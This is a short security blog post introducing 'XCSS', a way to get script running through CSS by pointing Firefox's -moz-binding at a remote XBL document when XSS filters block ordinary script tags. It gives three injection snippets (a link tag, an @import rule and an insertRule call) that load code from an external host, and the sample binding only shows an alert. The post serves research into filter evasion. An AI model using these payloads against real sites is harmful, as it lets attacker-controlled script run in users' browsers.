XCSS

I thought I'd continue the theme of experimenting with XSS and trying different things, I haven't seen this written about anywhere so here goes. The idea is using CSS as a XSS payload, this can be useful when filters allow some things but make it difficult to construct an attack.

I've decided to call it XCSS (Cross site Cascading Style Sheets) and there are many ways you can inject them into a document, I'll show how to do it in Firefox but it will be possible with other browsers as well.

Step 1 - A moz binding document

We first need a moz binding document to demonstrate this method, a sample one can be found here:- Moz Binding sample I'm not going to explain the details of what one can do, so if you want to find out more than just Google it. This example simply injects a Javascript alert.

Step 2 - Embedding the style

There are many ways of embedding a stylesheet into a document, here I'll show you three.

1. <pre lang="html">

<link href="//businessinfo.co.uk/ labs/xbl/xbl.xml#xss" rel="stylesheet" type="text/css" /> </pre>

2.<pre lang="html"><style type="text/css">@import url("//businessinfo.co.uk/labs/xcss/xcss.css");</style></pre>

3. Finally using javascript to add a rule to an existing style sheet:-

<pre lang="html"> &lt;script type=&quot;text/javascript&quot;&gt; function performXCSS() { css = document.styleSheets.item(0); css.insertRule('body {-moz-binding:url(&quot;//businessinfo.co.uk/labs/xbl/xbl.xml#xss&quot;);}', 0); } &lt;/script&gt; &lt;a href=&quot;javascript:performXCSS();&quot;&gt;Perform XCSS&lt;/a&gt; </pre>